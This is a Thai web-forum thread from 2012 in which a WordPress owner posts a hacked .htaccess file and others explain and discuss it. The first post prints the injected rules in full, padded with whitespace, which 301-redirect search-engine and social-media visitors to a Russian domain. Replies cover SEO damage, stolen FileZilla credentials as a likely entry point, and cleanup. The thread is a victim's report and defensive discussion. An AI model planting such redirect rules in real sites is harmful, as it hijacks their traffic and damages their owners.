wp โดนแฮ็กบน .htaccess

มาส่องมาลอง · 10 พฤษภาคม 2012, 20:09:41

โดนตัวนี้เข้าไปบน WP ไฟล์ .htaccess เว็บร่วงเลย

เว็บทำเงินด้วยใครช่วยแปลให้หน่อยคร้าบ มันทำไรกับเว็บผมเนี่บ ร้ายแรงมากเลยนะเนี่ย

<IfModule mod_rewrite.c>																														
																														RewriteEngine On																														
																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)																														
																														RewriteRule ^(.*)$ http://ademvoce.ru/herz?8 [R=301,L]																														
																														RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)																														
																														RewriteRule ^(.*)$ http://ademvoce.ru/herz?8 [R=301,L]																														
																														</IfModule>

แปลให้ฟังหน่อยครับมันทำอะไรกับเว็บผม

กว่าจะเจอกาน

ออว่าจะถามว่ามันมาทางใหนครับ ใช้บน Cpanel

Positron · 10 พฤษภาคม 2012, 20:31:05

เนื้อหาใน .htaccess มีแค่นี้เหรอครับ

ที่จริงแล้ว ถ้ามีแค่นี้หรือเขียนไม่ครบ หรือเขียนผิด ก็อาจจะทำให้เว็บ error จนอาจเข้าไม่ได้

มาส่องมาลอง · 10 พฤษภาคม 2012, 20:44:21

อ้างถึงจาก: Positron ใน 10 พฤษภาคม 2012, 20:31:05
เนื้อหาใน .htaccess มีแค่นี้เหรอครับ

ที่จริงแล้ว ถ้ามีแค่นี้หรือเขียนไม่ครบ หรือเขียนผิด ก็อาจจะทำให้เว็บ error จนอาจเข้าไม่ได้

ต้องลากสอร์บาไปขวาสุดๆๆครับเจอของดี

Soisiamdotcom · 10 พฤษภาคม 2012, 21:44:45

ตัวสคริปมันจะ redirect ไปเว็บ h..p://ademvoce.ru/herz?8 ทุกการเรียกหน้าเว็บคุณครับ

BrainFreeze · 10 พฤษภาคม 2012, 21:49:47

โดนทำ 301 Redirect ครับ

คล้ายกับประกาศว่าย้ายเว็บไซต์
ทิ้งไว้นานๆ เสีย backlink เสีย pr เลยครับ

มาส่องมาลอง · 10 พฤษภาคม 2012, 21:53:07

อ้างถึงจาก: BrainFreeze ใน 10 พฤษภาคม 2012, 21:49:47
โดนทำ 301 Redirect ครับ

คล้ายกับประกาศว่าย้ายเว็บไซต์
ทิ้งไว้นานๆ เสีย backlink เสีย pr เลยครับ

อ้างถึงจาก: Soisiamdotcom ใน 10 พฤษภาคม 2012, 21:44:45
ตัวสคริปมันจะ redirect ไปเว็บ http://ademvoce.ru/herz?8 ทุกการเรียกหน้าเว็บคุณครับ

ช่ายๆๆครับมันร้ายแรงมากๆๆ มานลบเว็บผมทุกที่เลย แมร่ง

เงินหายไป

ที่ตั้งกระทู้ก็อยากให้เป็นข้อมูลสำหรับคนที่โดนนะครับ จัด + ผู้ตอบแล้วนะครับ

jira2712 · 10 พฤษภาคม 2012, 22:04:40

ในส่วนของโปรแกรม อัฟข้อมูล file zilla ดาวโหลดฟรี ครับ ลองแก้ดูนะครับ โดยประมาณ โดยมากับตัว

nakprat · 10 พฤษภาคม 2012, 22:09:30

น่ากลัวมากครับ

ว่าแต่สำหรับ WP มีวิธีป้องกันไหมครับ มีปลั๊กอินตัวใดหรือ โค็ดอะไรป้องกันได้บ้าง
ขอบคุณครับ

m_manthai · 10 พฤษภาคม 2012, 22:09:44

อ้างถึงจาก: jira2712 ใน 10 พฤษภาคม 2012, 22:04:40
ในส่วนของโปรแกรม อัฟข้อมูล file zilla ดาวโหลดฟรี ครับ ลองแก้ดูนะครับ โดยประมาณ โดยมากับตัว

หมายถึงโปรแกรม file zilla มักจะเป็นสาเหตหรอท่าน

แล้วทำไมหลายๆคนจึงแนะนำตัวนี้หว่า ทั้งๆที่ผมมีตัวอื่นอยู่แล้ว แต่มาใช้ตัวนี้ตามคำแนะนำของคนในเวปนี้

Positron · 10 พฤษภาคม 2012, 22:42:25

อ้างถึงจาก: มาส่องมาลอง ใน 10 พฤษภาคม 2012, 20:44:21
อ้างถึงจาก: Positron ใน 10 พฤษภาคม 2012, 20:31:05
เนื้อหาใน .htaccess มีแค่นี้เหรอครับ

ที่จริงแล้ว ถ้ามีแค่นี้หรือเขียนไม่ครบ หรือเขียนผิด ก็อาจจะทำให้เว็บ error จนอาจเข้าไม่ได้

ต้องลากสอร์บาไปขวาสุดๆๆครับเจอของดี

อ๋อ ผมสกอบาร์ในกรอบนั้นไม่ได้อะครับ ก็เลยนึกว่ามีแค่นั้น

holidaytours · 10 พฤษภาคม 2012, 23:02:44

อ้างถึงจาก: nakprat ใน 10 พฤษภาคม 2012, 22:09:30
น่ากลัวมากครับ
ว่าแต่สำหรับ WP มีวิธีป้องกันไหมครับ มีปลั๊กอินตัวใดหรือ โค็ดอะไรป้องกันได้บ้าง
ขอบคุณครับ

อาจจะเป็นที่โฮสต์ก็ได้นะท่าน
เห็นมีเพื่อนในนี้เคยบอกไว้นะครับ

topsaler · 10 พฤษภาคม 2012, 23:18:41

จากสคริป มันจะ redirect เว็บอื่น ถ้ามีTraffic มาจาก search engin
อย่างเราเข้าตรงๆมันจะไม่ redirect ต้องเข้าผ่าน search engin แล้วเข้าเกิน
1ครั้งมันก้อไม่redirectอีก คนที่ไม่สังเกตุผมว่ามีเยอะนะ อีกอย่างมันติดได้หลาย file
ไม่เฉพาะ .htaccess ของผมล่าสุด ติดใน file function.php เล่นเอาเสียหลักไป
พักนึง traffic เยอะแต่ order หาย

สำหรับคนโดนไม่อยากปวดกะบานแก้เอง โยนให้ Support scanให้เลยครับ ไม่เกินชั่วโมง
เสร็จ และอัฟเดท wp เวอร์ชั่นล่าสุดด้วย เพราะที่โดนมีสาเหตุมากจากเวอร์ชั่นเก่ามีช่องโหว่ครับ

วิธีตรวจสอบง่ายๆ พิมพ์ site:เว็บของท่าน ในช่อง search engin
แล้วคลิกที่ลิงค์ ถ้า redirect ไปเว็บอื่น
แสดงว่าท่านโดนเข้าแล้ว

jira2712 · 10 พฤษภาคม 2012, 23:26:31

อ้างถึงจาก: m_manthai ใน 10 พฤษภาคม 2012, 22:09:44
อ้างถึงจาก: jira2712 ใน 10 พฤษภาคม 2012, 22:04:40
ในส่วนของโปรแกรม อัฟข้อมูล file zilla ดาวโหลดฟรี ครับ ลองแก้ดูนะครับ โดยประมาณ โดยมากับตัว

หมายถึงโปรแกรม file zilla มักจะเป็นสาเหตหรอท่าน

แล้วทำไมหลายๆคนจึงแนะนำตัวนี้หว่า ทั้งๆที่ผมมีตัวอื่นอยู่แล้ว แต่มาใช้ตัวนี้ตามคำแนะนำของคนในเวปนี้

file zilla ไว้สำหร้บแก้นะครับ แต่ มันเป็น open source

Innovation · 10 พฤษภาคม 2012, 23:40:53

วิธีแก้ไขสำหรับผู้ใช้ hostgator แบบได้ผลรวดเร็วทันใจ แม่นยำเที่ยงตรง ในกรณีแบบนี้ คือ แชทคุยกับ support ให้เค้าแก้ให้เรา
ไม่เกิน 3 ชม. เรียบร้อย สบายใจ กินได้ นอนหลับ

Soisiamdotcom · 10 พฤษภาคม 2012, 23:43:09

อ้างถึงจาก: nakprat ใน 10 พฤษภาคม 2012, 22:09:30
น่ากลัวมากครับ
ว่าแต่สำหรับ WP มีวิธีป้องกันไหมครับ มีปลั๊กอินตัวใดหรือ โค็ดอะไรป้องกันได้บ้าง
ขอบคุณครับ

อย่างคำตอบด้านบนสาเหตุส่วนใหญ่จะมาจาก file zilla ถ้าจะให้ดีใช้antivirus avast ครับเพราะว่าตัวนี้สามารถสแกนแม้แต่ไฟล์ที่ถูกเข้ารหัส ปลอดไวรัสชัวร์ ขณะอัพโหลดขึ้นโฮส

KenjiroAPI · 10 พฤษภาคม 2012, 23:47:07

ผมว่าโทษ Filezilla ไม่ได้นะครับ โทษผู้ใช้ดีกว่า

try2hack · 11 พฤษภาคม 2012, 00:03:07

อ้างถึงจาก: KenjiroAPI ใน 10 พฤษภาคม 2012, 23:47:07
ผมว่าโทษ Filezilla ไม่ได้นะครับ โทษผู้ใช้ดีกว่า

ไม่ได้โทษ Filezilla ครับ เขสไห้ใช้ Filezilla FTP เข้าไปแก้ไห้เป็นปรกติ เพราะว่าตัวโปรแกรมมันฟรีครบั อ่านดีๆ

KenjiroAPI · 11 พฤษภาคม 2012, 03:39:06

อ้างถึงจาก: try2hack ใน 11 พฤษภาคม 2012, 00:03:07
อ้างถึงจาก: KenjiroAPI ใน 10 พฤษภาคม 2012, 23:47:07
ผมว่าโทษ Filezilla ไม่ได้นะครับ โทษผู้ใช้ดีกว่า

ไม่ได้โทษ Filezilla ครับ เขสไห้ใช้ Filezilla FTP เข้าไปแก้ไห้เป็นปรกติ เพราะว่าตัวโปรแกรมมันฟรีครบั อ่านดีๆ

ผมไม่ได้หมายถึงคุณครับ ผมหมายถึงโพสต์ข้างบนของผม

อ้างถึงจาก: Soisiamdotcom ใน 10 พฤษภาคม 2012, 23:43:09
อ้างถึงจาก: nakprat ใน 10 พฤษภาคม 2012, 22:09:30
น่ากลัวมากครับ
ว่าแต่สำหรับ WP มีวิธีป้องกันไหมครับ มีปลั๊กอินตัวใดหรือ โค็ดอะไรป้องกันได้บ้าง
ขอบคุณครับ

อย่างคำตอบด้านบนสาเหตุส่วนใหญ่จะมาจาก file zilla ถ้าจะให้ดีใช้antivirus avast ครับเพราะว่าตัวนี้สามารถสแกนแม้แต่ไฟล์ที่ถูกเข้ารหัส ปลอดไวรัสชัวร์ ขณะอัพโหลดขึ้นโฮส

siriyot00 · 11 พฤษภาคม 2012, 03:43:18

ระวังโดนอีกรอบนะ มีรุ่นพี่ที่เป็น hacker อะ เขาบอกว่า เวลา hack เสร็จ เขาจะทำทางเข้าอะไรไว้ก็ไม่รู้ หรือผมมั่วหวา

cerberuz · 11 พฤษภาคม 2012, 06:55:14

จากประสบการณ์ตรงที่ใช้ filezilla เวลาคอมติดไว้รัสมันก็จะอ่านไฟล์ xml จาก filezilla นี่แหละแล้วเข้าไปปล่อยไฟล์hack FTP ไหนที่ไม่ได้เซฟไว้ใน filezilla จะรอด แต่เว็บไหนที่มีลิสอยู่ในโปรแกรม filezilla ก็โดนยกโฮสตอนนั้นโดนไปสามโฮส